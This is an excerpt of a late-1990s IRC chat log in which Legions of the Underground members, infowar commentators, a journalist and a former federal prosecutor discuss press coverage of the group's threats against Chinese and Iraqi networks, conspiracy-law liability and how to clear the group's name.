  1411.       [03:33] *** Joins: MsInfoWar (Beachie@*!*.uu.net)
  1412.       [03:33] <lothos> nationalpost.com or something
  1413.       [03:33] <Winn> and he claimed.....?
  1414.       [03:33] <optiklenz> we brought about the fundamental freedoms bequeathed =
  1415.       to
  1416.       us by the Constitution
  1417.       [03:33] <optiklenz> freedoms that the people we spoke for only wished the=
  1418.       y
  1419.       had
  1420.       [03:33] <lothos> something like LoU were terrorists
  1421.       [03:34] <delam> how do you guys relate to mosthated?
  1422.       [03:34] <optiklenz> we dont
  1423.       [03:34] <optiklenz> I dont even know the guy
  1424.       [03:34] <Winn> that's the spin I heard... how many were in on that 'spin'
  1425.       versus a HR action.
  1426.       [03:34] <optiklenz> none of the members did until he pulled that stunt wi=
  1427.       th
  1428.       the national post
  1429.       [03:34] <feur> optik, did you notify national post
  1430.       [03:34] <optiklenz> you mean the dismanteling of chinese firewalls?
  1431.       [03:34] <optiklenz> I notified no one
  1432.       [03:35] <Winn> If it
  1433.       [03:35] <optiklenz> As far as i was concerned this matter was not that of
  1434.       the press
  1435.       [03:35] <optiklenz> and never should of been
  1436.       [03:35] <feur> notify national post of mosthated's non-affiliation
  1437.       [03:35] <optiklenz> Im not sure if any of the members did
  1438.       [03:35] <Winn> If it's awareness, then did anyone consider an EDT-like
  1439.       action?
  1440.       [03:35] <optiklenz> but I will most definitly look into that
  1441.       [03:36] <optiklenz> I posted a second rebuttal.  It explains a lot if you=
  1442.       'd
  1443.       take the time to read it
  1444.       [03:36] <optiklenz> www.legions.org/reb2.txt
  1445.       [03:36] <Winn> OPTIK: URL?
  1446.       [03:36] <Winn> sorry...
  1447.       [03:36] <optiklenz> members of LoU have met up with 2600, L0pht and other
  1448.       people to clear things up
  1449.       [03:37] <optiklenz> infact just a few weeks ago bronc was at dinner with
  1450.       emmanuel and issac from the 2600 staff setting things straight
  1451.       [03:37] <feur> winn, to get with the program, we got together to help LOU=
  1452.       ,
  1453.       not pimp them
  1454.       [03:37] <optiklenz> Things were posted and said that were totally false
  1455.       [03:38] <delam> have you guys been taking any heat from other hackers or
  1456.       from anyone else?
  1457.       [03:38] <optiklenz> no
  1458.       [03:38] <feur> optik, are you under any guidance from counsel now
  1459.       [03:39] <m0f0> only in lame greetings
  1460.       [03:39] <optiklenz> the only thing I fear is some chinese loyalist knocki=
  1461.       ng
  1462.       at my door ready to spike my head into the punch bowl
  1463.       [03:39] <DigiEbola> my fears exactly
  1464.       [03:39] <lothos> the only heat we've gotten that I know about is the
  1465.       cDc/2600/l0pht rebuttal
  1466.       [03:39] <optiklenz> If you guys have the time check out http://pseudo.com
  1467.       they host a show called parse
  1468.       [03:40] <feur> optik, are you under any guidance from counsel now
  1469.       [03:40] <optiklenz> no
  1470.       [03:40] <optiklenz> Im just trying to get things back to normal
  1471.       [03:40] <feur> is anyone in legions represented by counsel
  1472.       [03:40] <optiklenz> as in?
  1473.       [03:40] <optiklenz> a lawyer of some sort?
  1474.       [03:40] <feur> yes
  1475.       [03:40] <optiklenz> lawyers are for criminals
  1476.       [03:41] <lothos> not I.
  1477.       [03:41] <optiklenz> and we have commited no crime
  1478.       [03:41] <DigiEbola> not I. I actually have no lawyer
  1479.       [03:41] <dyslexia> nor i
  1480.       [03:41] <feur> and also buffers for fearful apparitions
  1481.       [03:41] <lothos> I agree with optik, lawyers are for criminals. :-)
  1482.       [03:41] <optiklenz> We'd like to set things straight
  1483.       [03:42] <optiklenz> with you, with the "hacking" community, with federal
  1484.       angencies whomever
  1485.       [03:42] <delam> I'd bet that after the press you probably have some feds
  1486.       curious
  1487.       [03:42] <m0f0> they already are
  1488.       [03:42] <Father> Hmmm.  Are lawyers for criminals, or for people whom oth=
  1489.       er
  1490.       people claim are criminals?
  1491.       [03:42] <delam> how do you know?
  1492.       [03:42] <lothos> I got almost 50 .mil and .gov hits to rootfest.org in th=
  1493.       e
  1494.       past four days
  1495.       [03:42] <dyslexia> delam, both wired and the national post have quotes fr=
  1496.       om
  1497.       feds
  1498.       [03:42] <Winn> OPT: Your posting says a polish grp did stuff you got blam=
  1499.       ed
  1500.       for. What happened?
  1501.       [03:42] <maquis> from what i've seen the feds have no clue...they're prol=
  1502.       ly
  1503.       the LAST thing to worry about....
  1504.       [03:43] <lothos> thats good to know, maquis
  1505.       [03:43] <m0f0> maybe to find us, or to get prove? curious they are
  1506.       [03:43] <optiklenz> Winn> a polish group got the wrong idea and basically
  1507.       went out attacking chinese sites saying they were doing it for our effory=
  1508.       t
  1509.       [03:43] <DigiEbola> I am more worried about .cn, then feds at this time
  1510.       [03:43] <optiklenz> effort rather
  1511.      [03:43] <datapleX> maquis: what does internic have to do with this(if you
  1512.       are representing them at this meeting that is)?
  1513.       [03:43] <maquis> < - not representing internic....mearly logged in from
  1514.       there. :)
  1515.       [03:43] <lothos> i think he said he was with infowar...
  1516.       [03:44] <maquis> < - friend of infowar.com
  1517.       [03:44] <feur> maquis, they probably have high interest due interfere in
  1518.       geopolitical theater
  1519.       [03:44] <datapleX> oh
  1520.       [03:44] <delam> that's a cool place to log in from, can I have an account=
  1521.       ?
  1522.       :)
  1523.       [03:44] <maquis> yeah, right....:)
  1524.       [03:44] <m0f0> yeah, hook us up
  1525.       [03:44] <optiklenz> www.pseudo.com/links/playlast.asp?archtype=3Dvid&show=
  1526.       id=3D21
  1527.       [03:44] <delam> never hurts to ask :)
  1528.       [03:44] <maquis> har. i can arrange tours though.... :)
  1529.       [03:44] <optiklenz> thats the last parse episode if anyone wants to check=
  1530.       it
  1531.       out
  1532.       [03:44] <delam> cool!
  1533.       [03:45] <DigiEbola> ill remember that when im in the area hehee
  1534.       [03:45] <optiklenz> bronc went on and represented the legions team basica=
  1535.       lly
  1536.       just setting the record straight and telling everyone the real deal
  1537.       [03:45] <DigiEbola> "whats this button do!? ewpzie"
  1538.       [03:45] <Winn> Does your URL rep the real deal? Is this the current
  1539.       position?
  1540.       [03:45] <DigiEbola> bronc did a fine job of representation
  1541.       [03:45] <optiklenz> yes
  1542.       [03:45] <optiklenz> actually if everyone wants
  1543.       [03:45] <optiklenz> play the url i just posted
  1544.       [03:46] <optiklenz> set the buffer to about 25
  1545.       [03:46] <optiklenz> Thats about when bronc starts talking
  1546.       [03:46] <feur> optik, when all this broke, were you in violation of
  1547.       probation
  1548.       [03:46] <optiklenz> No
  1549.       [03:46] <optiklenz> I went to texas for awhile to stay with a friend
  1550.       [03:47] <optiklenz> to get away from the media, and well everything else
  1551.       that could happen if worst came to worst
  1552.       [03:47] <MsInfoWar> was bronc invited to come tonight?
  1553.       [03:47] <datapleX> is mark awake?
  1554.       [03:47] <optiklenz> Bronc was but he declined
  1555.       [03:47] <optiklenz> he was unsure of what to make of tonights get togethe=
  1556.       r
  1557.       but i will relay everything him
  1558.       [03:47] <optiklenz> to him
  1559.       [03:47] <feur> how members have been contacted by us and other country
  1560.       intelligence or law enforcement agencies
  1561.       [03:47] <Winn> I met up with the EDT this weekend and they want to contin=
  1562.       ue
  1563.       strong HR and political actions. Do you want to continue to speak out?
  1564.       [03:48] <lothos> question. who/what is EDT?
  1565.       [03:48] <optiklenz> We do as long as everyone understands that we are not
  1566.       criminals
  1567.       [03:48] <Winn> Electronic Disruption Theater
  1568.       [03:48] <Winn> They are on line activists
  1569.       [03:48] <datapleX> HR =3D ?
  1570.       [03:49] <optiklenz> and we are merely speaking on what we beleive to be
  1571.       amended
  1572.       [03:49] <lothos> I am NOT a criminal.  I'll say that now.
  1573.       [03:49] <optiklenz> data>human rights
  1574.       [03:49] <datapleX> k
  1575.       [03:49] <Winn> To them it's an Art Form to protest.
  1576.       [03:49] <Father> I think that's what RTM & Eugene AlterNIC said.
  1577.       [03:49] <delam> scary
  1578.       [03:49] <DigiEbola> I do not want us to go down as criminals or martyrs
  1579.       [03:50] <optiklenz> Winn> our foremost intent as of right now is to get
  1580.       things cleared
  1581.       [03:50] <optiklenz> before we continue speaking on human rights we'd like=
  1582.       to
  1583.       make certain that people understand who we are and where we are coming fr=
  1584.       om
  1585.       [03:50] <Winn> How can we help get your message across?
  1586.       [03:50] <optiklenz> not precisely where we are coming from but you get th=
  1587.       e
  1588.       idea
  1589.       [03:50] <optiklenz> =3D]
  1590.       [03:50] <DigiEbola> A lot of people have asked us that same question.
  1591.       [03:51] <m0f0> i'm from greek now at the moment
  1592.       [03:51] <optiklenz> Some funding would be nice
  1593.       [03:51] <optiklenz> =3D]
  1594.       [03:51] <DigiEbola> including cbs and nbc from what i understand
  1595.       [03:51] <optiklenz> but i dont see that
  1596.       [03:51] <delam> heh
  1597.       [03:51] <optiklenz> so lets move on shall we
  1598.       [03:51] <optiklenz> heh
  1599.       [03:51] <DigiEbola> what makes you people any different from the rest?
  1600.       [03:51] <maquis> cbs/nbc there's media for ya....urg....TWPPT!
  1601.       [03:51] * optiklenz urges mark to flutter his "heh's"
  1602.       [03:51] * DigiEbola senses pimping.
  1603.       [03:51] <m0f0> lol
  1604.       [03:52] <maquis> theres a difference between the "media" and those of us =
  1605.       in
  1606.       the know like Winn, me, etc. that actually have some credibility in the
  1607.       IT/IS/INFOSEC world...
  1608.       [03:52] <feur> father, as an attorney i know you can only suggest ideas, =
  1609.       non
  1610.       directed, could you be of assistance
  1611.       [03:52] <optiklenz> Winn> Maybe if you make a statement speaking on our
  1612.       bedrock
  1613.       [03:52] <optiklenz> made a statement even
  1614.       [03:53] <maquis> people i have seen trust us more than the Big Media
  1615.       Mongrels...
  1616.       [03:53] <optiklenz> I've visited infowar a few times and I've seen archiv=
  1617.       es
  1618.       of media corrupt media to put it another way
  1619.       [03:53] <Winn> I think that getting unedited, well structured positions o=
  1620.       ut
  1621.       to larger audiences is critical to any message.
  1622.       [03:53] *** Quits: MsInfoWar (Ping timeout for
  1623.       MsInfoWar[1Cust33.tnt4.st-petersburg.fl.da.uu.net]=0F)
  1624.       [03:53] <optiklenz> It's spreaded infectiously
  1625.       [03:53] <maquis> getting raw data, no spin, edits, etc....i agree that's =
  1626.       the
  1627.       way to go....
  1628.       [03:54] <delam> one point of interest that I know of when you have a "gro=
  1629.       up"
  1630.       with a name is legally there are more things they can do to you.. MOD had
  1631.       problems with that.. the people I was with we stayed away from having a
  1632.       group name
  1633.       [03:54] <maquis> but it can't appear to be from "kiddies" and look immatu=
  1634.       re.
  1635.       like Winn says, wellbalanced and well presented stuff.
  1636.       [03:54] <Mark668> {sorry, I had to attend to other stuff for a minute:
  1637.       hehehehehehe]
  1638.       [03:54] <Father> First, I am not acting as an attorney here (as Winn know=
  1639.       s).
  1640.       [03:54] *** Joins: MsInfoWar (Beachie@*!*.uu.net)
  1641.       [03:54] <DigiEbola> hmm
  1642.       [03:54] <optiklenz> we have no legal name
  1643.       [03:54] <optiklenz> heh
  1644.       [03:54] <lothos> hahah
  1645.       [03:55] <optiklenz> Lets see
  1646.       [03:55] <DigiEbola> I am concerned tho, no body does anything for free
  1647.       [03:55] <optiklenz> one sec
  1648.       [03:55] <optiklenz> Lets take the police department
  1649.       [03:55] <Father> Second, I need to know what (1) what the problem *is*, a=
  1650.       nd
  1651.       (2) what th desired result is.
  1652.       [03:55] <optiklenz> If you have one bad cop and this guy goes out and
  1653.       murders someone
  1654.       [03:55] <optiklenz> is the whole police deparment at fault?
  1655.       [03:55] <optiklenz> do they all get the death sentance?
  1656.       [03:55] <optiklenz> are they all punished ?
  1657.       [03:55] <optiklenz> absolutely not
  1658.       [03:55] <delam> no but there is "racketeering" and conspiracy etc
  1659.       [03:55] <optiklenz> Because then we'd have no cops
  1660.       [03:55] <Father> Sometimes.  Not legally, but in fact.
  1661.       [03:55] <optiklenz> if that were the case
  1662.       [03:55] * datapleX feels that isn't a good example...
  1663.       [03:56] <optiklenz> everyone department has a good and a bad
  1664.       [03:56] <optiklenz> to stick us in the middle isn't any different
  1665.       [03:56] <delam> I know what you're saying, but being a group there are la=
  1666.       ws
  1667.       that apply to groups of people that can be more harsh
  1668.       [03:56] <delam> maybe father can help me out on this
  1669.       [03:56] <DigiEbola> I am just trying to understand everyones motives, why
  1670.       give a care about LoU?
  1671.       [03:57] <Father> P.S. I think Winn invited me because I am a former Fed.
  1672.       Pros.  Be warned.
  1673.       [03:57] <optiklenz> ok
  1674.       [03:57] <optiklenz> now is a good time to pee my pants i guess
  1675.       [03:57] <feur> digi, we spoke the other night, i believe my generation ha=
  1676.       s
  1677.       an obligation to assist, but not be suckers
  1678.       [03:57] <DigiEbola> Winn is associated with gov, that scares me in itself
  1679.       [03:57] * datapleX cares not about feds because he never did NEthing wron=
  1680.       g
  1681.       [03:57] *** Joins: ice (~ice@i.like.to.eat.negrofish.net)
  1682.       [03:58] <Father> Delam.  If a group acts as a group to break the law,
  1683.       various serious penalties come into play that
  1684.       [03:58] <DigiEbola> feur: true, but everyone always has a motive
  1685.       [03:58] <optiklenz> Father> yes but we are not a mafia
  1686.       [03:58] <Father> would not apply to an individual based upon his own
  1687.       separate acts.
  1688.       [03:58] <optiklenz> we are not into "organized crime"
  1689.       [03:58] <feur> i think this groups agenda is somewhat up front
  1690.       [03:58] <Winn> I am associated with hackers and that scares the hell out =
  1691.       of
  1692.       the feds!
  1693.       [03:58] <optiklenz> every member has their own program
  1694.       [03:58] <delam> optik: MOD wasn't mafia either but they had some major
  1695.       problmes
  1696.       [03:58] <dyslexia> Winn, heh
  1697.       [03:58] <Father> Te questions is:  did the group have a common purpose to=
  1698.       do
  1699.       something the law says is illegal.
  1700.       [03:59] <optiklenz> We are all adults no one can police what another pers=
  1701.       on
  1702.       does
  1703.       [03:59] <maquis> i'm associated with Winn, that scares the hell out of ME=
  1704.       !!!
  1705.       heheheehe
  1706.       [03:59] <Winn> HA!
  1707.       [03:59] <dyslexia> lol
  1708.       [03:59] <optiklenz> Father> nope
  1709.       [03:59] <optiklenz> never had never will
  1710.       [03:59] <optiklenz> We are a research group
  1711.       [03:59] <Winn> Is this the "Yelling Fire
  1712.       [03:59] <Winn> arguement?
  1713.       [03:59] <datapleX> I thought is was wolf...?
  1714.       [04:00] <datapleX> erm...n/m
  1715.       [04:00] <optiklenz> We've worked with lots of major corporations, and we =
  1716.       are
  1717.       not about to blow our rep
  1718.       [04:00] <optiklenz> its Crying Wolf
  1719.       [04:00] <optiklenz> i beleive
  1720.       [04:00] <optiklenz> Yelling fire is what old people do when they cant get
  1721.       out of bed in time
  1722.       [04:00] <delam> worked with corporations?  what kinda work is it,
  1723.       penetration testing?
  1724.       [04:00] <Father> The conclusion that a group had the requisite common
  1725.       purpose is drawn by agents, prosecutors, judges, and jurors.  Even Bill
  1726.       Clinton says he didn't lie, because is ain't is.
  1727.       [04:01] <optiklenz> delam> programing, hosting, design, security
  1728.       consultation
  1729.       [04:01] <DigiEbola> our common purpose is research
  1730.       [04:01] <optiklenz> you name
  1731.       [04:01] *** Joins: sreality (sreality@*!*.org)
  1732.       [04:01] <optiklenz> it
  1733.       [04:01] <delam> k
  1734.       [04:01] <Winn> I meant did you offer subtle encouragement for others to t=
  1735.       ake
  1736.       an action and is that really wrong?
  1737.       [04:01] <optiklenz> no
  1738.       [04:01] <optiklenz> No one took any action
  1739.       [04:01] <optiklenz> thats the point we are trying to make
  1740.       [04:02] <optiklenz> none  of the members did a cotten pickin thing
  1741.       [04:02] <Father> Winn - the answer to the second part of your question,
  1742.       legally speaking, is yes.
  1743.       [04:02] <Winn> DId others, tho? THe Poles? Ideas are free and legal.
  1744.       [04:02] <optiklenz> The Poles did
  1745.       [04:02] <Winn> Are you saying Dad, that there might be legal culpability =
  1746.       fo
  1747.       their ideas?
  1748.       [04:02] *** Quits: pent (=F9=ED=F9 Total uptime :    0d  0h 42m 42s=0F)
  1749.       [04:02] <DigiEbola> can one be prosecuted for having a idea?
  1750.       [04:02] <optiklenz> We claim no affiliations
  1751.       [04:02] <optiklenz> whatever the polish people do in poland is on them
  1752.       [04:03] <Father> I don't answer to "Dad."
  1753.       [04:03] <lothos> no digi
  1754.       [04:03] <lothos> this isn't 1984 I don't think.
  1755.       [04:03] <Father> Sore point, Winn.
  1756.       [04:03] <optiklenz> what we are saying here to night is we spoke our mind=
  1757.       we
  1758.       let people know what we were thinking and if that is a crime then I shoul=
  1759.       d
  1760.       be sentanced to death
  1761.       [04:03] <optiklenz> because that is something I do
  1762.       [04:03] <optiklenz> time and time again!
  1763.       [04:03] <DigiEbola> lothos: ya never know....
  1764.       [04:03] <Winn> Sorry, Father... :( I slap myself silly...
  1765.       [04:03] <m0f0> i would be way under ground then
  1766.       [04:04] <Father> Nor "Pop"
  1767.       [04:04] <Father> "Hey you" might work.
  1768.       [04:04] <delam> padre? :)
  1769.       [04:04] <Father> Hmmm.  Not bad.
  1770.       [04:05] <Father> Thoughts ain't a crime.
  1771.       [04:05] <optiklenz> yeah
  1772.       [04:05] <Winn> Legally, that is. :-)
  1773.       [04:05] <optiklenz> if it was my next door neighbor could very well sue m=
  1774.       e
  1775.       for harassment
  1776.       [04:05] <optiklenz> =3D]
  1777.       [04:05] <lothos> hahah
  1778.       [04:06] <Father> Two people agreeing (real low threshold) about something=
  1779.       ,
  1780.       and one of them doing a little something about it qualifies as a conspira=
  1781.       cy:
  1782.       5 years, $250K.
  1783.       [04:06] <optiklenz> god knows what I've been thinking
  1784.       [04:06] <optiklenz> heh
  1785.       [04:06] <optiklenz> 250k?
  1786.       [04:06] <Winn> Is that RICO?
  1787.       [04:06] <delam> yeah, that's one I remember
  1788.       [04:06] <optiklenz> hrmm I can grab some k's out of the ole alphabet soup
  1789.       [04:06] <dyslexia> Father, at this point, regardless of what lou has said=
  1790.       ,
  1791.       without the help of a rather emphatic media, this whole issue would have
  1792.       gone nowhere, the whole thing has been hyped and kept alive by the media,
  1793.       suerly this cannot be construed as a crime on our part
  1794.       [04:06] <Father> No, general conspiracy statute.
  1795.       [04:06] <optiklenz> but i dont know about doing crime for something I did=
  1796.       nt
  1797.       know was going on
  1798.       [04:07] <optiklenz> crime=3Dtime
  1799.       [04:07] <optiklenz> Im fallin asleep here
  1800.       [04:07] <DigiEbola> hm
  1801.       [04:07] <maquis> the way this administration is going, there may  just be=
  1802.       a
  1803.       conspiracy statute..... :)
  1804.       [04:08] <optiklenz> conspiracy of what?
  1805.       [04:08] <m0f0> this is more getting to a discussion
  1806.       [04:08] <Father> Whether you knew something was going on or not is a fact
  1807.       question.  As is whether you wanted to encourage something to go on, even=
  1808.       if
  1809.       you didn't know it actually did.  Both of those can be conspiracy
  1810.       liabilities.
  1811.       [04:08] <delam> so is the real issue the ability to identify an individua=
  1812.       l
  1813.       on the internet who's making claims or speaking for others?  How much pro=
  1814.       of
  1815.       is there of this and have you guys tried to learn the real name etc of th=
  1816.       e
  1817.       guy who did say this stuff.
  1818.       [04:08] <optiklenz> conspiracy of saying that we dont agree on certain
  1819.       issues?
  1820.       [04:08] <datapleX> I thought conspiracy was only against your own country=
  1821.       ?
  1822.       [04:08] <maquis> anything...hell, not to start a new can of worms, but lo=
  1823.       ok
  1824.       at the crypto debate and privacy rights. 'nuff said...and DON'T start a
  1825.       crypto-chat debate!  :)
  1826.       [04:08] <Father> Wrong.  Two prongs in general conspiracy stattue.
  1827.       [04:09] <optiklenz> delam> theres a polish group, and a few other groups
  1828.       from out of the u.s
  1829.       [04:09] <optiklenz> they are the ones that are attacking these sites
  1830.       [04:09] <optiklenz> not us
  1831.       [04:09] <optiklenz> we wanted to speak out and make things known and noth=
  1832.       ing
  1833.       more
  1834.       [04:09] <optiklenz> and that is all we did
  1835.       [04:09] <Father> First prong: conspiracy to deprive the US gov. of some
  1836.       right to function.
  1837.       [04:09] <lothos> dataplex: that's treason man
  1838.      [04:09] <optiklenz> something we didnt do
  1839.       [04:09] <Father> Second: conspiracy to violate a law on the books, no mat=
  1840.       ter
  1841.       who the victim is.
  1842.       [04:10] <m0f0> can't we just buy a law book or something?
  1843.       [04:10] <optiklenz> another thing we have yet to do
  1844.       [04:10] <delam> father: did the hacker that did make claims in the name o=
  1845.       f
  1846.       this group commit any crimes taht you know of?
  1847.       [04:10] <Winn> Is hacking China illegal? OR Iraq?
  1848.       [04:10] <optiklenz> Why ask us?
  1849.       [04:10] <DigiEbola> well, lets take a step away from us liabilities a mom=
  1850.       ent
  1851.       and focus on .cn actions, you ppl seem to have some insight that they are
  1852.       wanting to get rid of us
  1853.       [04:10] <optiklenz> We did none of that
  1854.       [04:10] <lothos> i agree digi
  1855.       [04:10] <Father> Conspiracy to get unauthorized access to computer is cri=
  1856.       me,
  1857.       no matter who victim is, even Iraq or Iran or Ireland.
  1858.       [04:11] <DigiEbola> i am more worried about .cn then .us
  1859.       [04:11] <lothos> father, even .jp?  Hacking isn't illegal in japan i
  1860.       thought...
  1861.       [04:11] <m0f0> then they will thing of something to put you in jail for
  1862.       [04:11] <datapleX> loth: depends on where the hack originates from
  1863.       [04:12] <Father> As long as Japanese computer is hooked up to a computer =
  1864.       in
  1865.       US, hacking into the Japanese computer is US crime.
  1866.       [04:12] <Winn> I suggest that .cn doesnt 'get' it completely. They try to
  1867.       ban sat dishes and now the death penalty for $34K in hacking a bank. Mayb=
  1868.       e a
  1869.       call for detente is called for here.
  1870.       [04:12] <delam> perhaps transport of illegally acquired information from =
  1871.       any
  1872.       other country would be considered illegal by us law?
  1873.       [04:12] <lothos> what if i hack a .jp computer from another .jp computer?
  1874.       would that be illegal? (sorry to stray off topic here..)
  1875.       [04:12] <maquis> delam, HTF are you gonna enforce that one? that's amost =
  1876.       as
  1877.       funny as something AG Reno would say!!!
  1878.       [04:13] <Father> I'll punt on your last question, delam: too fact specifi=
  1879.       c.
  1880.       [04:13] <optiklenz> groups run by little kids with names like HcV, Tougon=
  1881.       g
  1882.       (individual), NIS, Polish Hackers against China, spl0it are the ones doin=
  1883.       g
  1884.       all the illegitimate protest
  1885.       [04:14] <Father> Lothos, depends on whether hacked computer is connected
  1886.       (indirectly) to computer in US.  Hey, what omputer worth hacking ain't on
  1887.       the Inernet?
  1888.       [04:14] *** Quits: Mark668 (Read error to
  1889.       Mark668[adsl-209-78-192-20.dsl.pacbell.net]: EOF from client=0F)
  1890.       [04:14] <optiklenz> heh
  1891.       [04:14] <lothos> so if i'm physically on u.s. soil then it'd be a crime?
  1892.       [04:14] *** Joins : Mark668 (irc@*!*.pacbell.net)
  1893.       [04:14] <Father> P.S. I may sign off for a while.  If I do, I'll be back.
  1894.       [04:15] <optiklenz> lothos> no
  1895.       [04:15] <optiklenz> If you log into a system that is based in japan
  1896.       [04:15] <optiklenz> and from that system access another its not illegal
  1897.       [04:15] <Father> Yep.  Question is whether anyone would prosecute. If Jap=
  1898.       an,
  1899.       Inc. asked, someone might.
  1900.       [04:15] <optiklenz> or maybe it is
  1901.       [04:15] <optiklenz> heh
  1902.       [04:16] <m0f0> "heh"
  1903.       [04:16] <Winn> According to FBI, they can git ya for hacking intl based u=
  1904.       pon
  1905.       some interpretation of #1030/1029
  1906.       [04:16] <optiklenz> ah
  1907.       [04:16] <optiklenz> ok
  1908.       [04:16] <feur> IMHO, a more subtle question at this point is what if acti=
  1909.       ons
  1910.       will .cn and Iraq take legally or illegally
  1911.       [04:16] <optiklenz> what can they do?
  1912.       [04:16] <optiklenz> we've done nothing to any systems in .cn or iraq
  1913.       [04:16] <optiklenz> plus iraq is not even setup to a global network
  1914.       [04:17] <optiklenz> and most of their internal networks are probably blow=
  1915.       n
  1916.       to shreads by now
  1917.       [04:17] <Father> Remember, at the base level, jurisdiction is merely powe=
  1918.       r;
  1919.       like code is merely bits.
  1920.       [04:17] <feur> the purported threat to those countries systems
  1921.       [04:17] <maquis> iraq doesn't have much in the way of connectivity outsid=
  1922.       e
  1923.       the nation....
  1924.       [04:17] <optiklenz> not even via tymnet
  1925.       [04:17] <Winn> Sometimes the best way to disguise is to emphasize. I stil=
  1926.       l
  1927.       think you need to get LOUD AND CLEAR about what you're really about.
  1928.       [04:17] <optiklenz> and the only x.25 they've heard of is pocket change
  1929.       [04:18] <feur> optik, x.25 and sna, is generally out of the  reach and gr=
  1930.       asp
  1931.       of today's hax0rs
  1932.       [04:18] <delam> fact #1: it's hard as hell to prove any crime on the
  1933.       internet, and I'm sure you all know that, therefore #2, you're not worrie=
  1934.       d
  1935.       about any LEGAL actions by china or the US but you're more worried about =
  1936.       non
  1937.       legal actions
  1938.       [04:18] <DigiEbola> exactly
  1939.       [04:19] <DigiEbola> it may be not only to off us, but to test the us gov
  1940.       [04:19] <DigiEbola> if one of us got killed, what would the us do?
  1941.       [04:19] <optiklenz> as i stated what if some chinese loyalist gets the wr=
  1942.       ong
  1943.       idea and decides to use our heads as hunting trophies
  1944.       [04:19] <optiklenz> theres not much they could do
  1945.       [04:19] <lothos> I personally am worried about what .cn would do to us,
  1946.       legally or not.
  1947.       [04:20] <feur> optik, it would not be a chinese loyalist, it would organi=
  1948.       zed
  1949.       chinese gangs
  1950.       [04:20] <optiklenz> yeah
  1951.       [04:20] <optiklenz> thats something to worry about
  1952.       [04:20] <Mark668> Excuse me, I have to disappear for a while ... I'll be
  1953.       back ... I got a message from Betty that I was expected to "say" somethin=
  1954.       g
  1955.       ... if someone would let me know what I'm supposed to say, please private
  1956.       chat me.
  1957.       [04:20] <optiklenz> Mark> who are you again?
  1958.       [04:21] <maquis> most of the .cn gangs alrady operate her in the states...
  1959.       [04:21] <delam> There is a reverse philosophy but it sounds insane, it's =
  1960.       a
  1961.       people-buffer-overflow.. if more people started hacking china, the number=
  1962.       of
  1963.       targets that china would go after would increase beyond what they could h=
  1964.       ave
  1965.       the man power to handle
  1966.       [04:21] <optiklenz> yeah thats the thing
  1967.       [04:21] <DigiEbola> they have a lot of people
  1968.       [04:21] <optiklenz> people totally blew what we said out of proportion
  1969.       [04:22] <Father> Any one gonna be at CFP99?
  1970.       [04:22] <delam> I wish
  1971.       [04:22] <optiklenz> Father> nope
  1972.       [04:22] <maquis> maybe if i can get away from work...always a problem the=
  1973.       se
  1974.       days....
  1975.       [04:22] <lothos> anyone gonna be at RootFest? :)
  1976.       [04:22] <optiklenz> I'll be lecturing at rootfest though
  1977.       [04:22] <Winn> Via vidtel
  1978.       [04:22] <delam> rootfest in MPLS?
  1979.       [04:22] <lothos> so is winn via video conf
  1980.       [04:22] <optiklenz> yes
  1981.       [04:22] <Mark668> I'm an freelance writer and consultant (see
  1982.       http://www.gibbs.com/mgbio.htm for a ... well, bio) I write for Network
  1983.       World (the weekly Backspin column and, starting on the 25th, a weekly
  1984.       feature called "Gearhead".
  1985.       [04:23] <lothos> that reminds me, winn.. we need to tlak about that still
  1986.       [04:23] <lothos> talk
  1987.       [04:23] <Winn> tomorrow!
  1988.       [04:23] <Father> Signing off.  Be back. - Father, aka Padre ;-)
  1989.       [04:23] <delam> heh :)
  1990.       [04:23] <lothos> sure
  1991.       [04:23] <optiklenz> mark> ok
  1992.       [04:23] <DigiEbola> hm
  1993.       [04:23] <lothos> I'll give you a call
  1994.       [04:23] <feur> what can winn and local friends and...., do and gain
  1995.       permission from LOU, to assert some risk management in this somewhat jade=
  1996.       d
  1997.       affair
  1998.       [04:23] <Winn> thanks... > noon
  1999.       [04:24] *** Quits: Father (Leaving=0F)
  2000.       [04:24] <optiklenz> What can you do?
  2001.       [04:24] <lothos> I have a class at noon... would 1pm work CST?
  2002.       [04:24] <Winn> yep!
  2003.       [04:24] <lothos> cool, 1pm CST then.
  2004.       [04:24] <maquis> make it so, Mister Winn..... :)
  2005.       [04:25] <DigiEbola> options options options
  2006.       [04:25] <feur> 1. establish a unified position
  2007.       [04:25] <feur> 2. control disseminations to the media
  2008.       [04:26] <delam> passively time is the best option, actively that's
  2009.       difficult.. the media is the best option I can think of actively
  2010.       [04:26] <feur> 3. establish some DC international attorney to act as buff=
  2011.       er
  2012.       [04:26] <Winn> You need to have a SINGLE mouthpiece if you really want to
  2013.       control the message. Or have a bunch of folks sign the same one.
  2014.       [04:27] <optiklenz> I think getting an attorney would only make people th=
  2015.       ink
  2016.       we have reason to be afraid like we did something criminal that justifies
  2017.       having one
  2018.       [04:27] *** Quits: MsInfoWar (Ping timeout for
  2019.       MsInfoWar[1Cust33.tnt4.st-petersburg.fl.da.uu.net]=0F)
  2020.       [04:27] <feur> optik, the right attorney only acts as a buffer, not an
  2021.       admission ogf guilt
  2022.       [04:27] <optiklenz> Well if i can find an attorney i can afford i'll look
  2023.       into it
  2024.       [04:28] <Winn> Try the EFF maybe or EPIC or the CDC
  2025.       [04:28] <DigiEbola> .cn would care less if we have a attorney
  2026.       [04:28] <DigiEbola> heh
  2027.       [04:28] <delam> If you all did a press conference and were serious about =
  2028.       it,
  2029.       a lawyer would be great to help decide what needs to be said.
  2030.       [04:28] <feur> i took the liberty of contacting an old acquaintance from =
  2031.       the
  2032.       DOJ, who is in private practice in Boston, well known, and would pro bono
  2033.       look into the whole
  2034.       [04:29] <optiklenz> ok well this is a conference with out the "press"
  2035.       [04:29] <optiklenz> frankly Im tired of having people get things wrong
  2036.       [04:29] <optiklenz> not only has it hurt me, but it's done a great deal t=
  2037.       o a
  2038.       lot of other people
  2039.       [04:30] <DigiEbola> ppl will see what they want to see
  2040.       [04:30] <feur> but optik, tonight we hear from you, what do the other
  2041.       members of LOU want to do
  2042.       [04:30] <optiklenz> We are here as representatives of the group
  2043.       [04:30] <optiklenz> We've takin what they think, and what they want into
  2044.       consideration, and we are giving it to you
  2045.       [04:30] <optiklenz> as a whole
  2046.       [04:31] <DigiEbola> part of the reason, the press blew this up, is becaus=
  2047.       e
  2048.       THEY wanted to see someone break stuff in those countries
  2049.       [04:31] <optiklenz> can we take a 5minute bathroom break?
  2050.       [04:31] <feur> i think the next step would be to set up a VMB to chat
  2051.       [04:31] <delam> alliance teleconference? :)
  2052.       [04:31] <delam> ..memories
  2053.       [04:31] <Winn> Free from GTE?
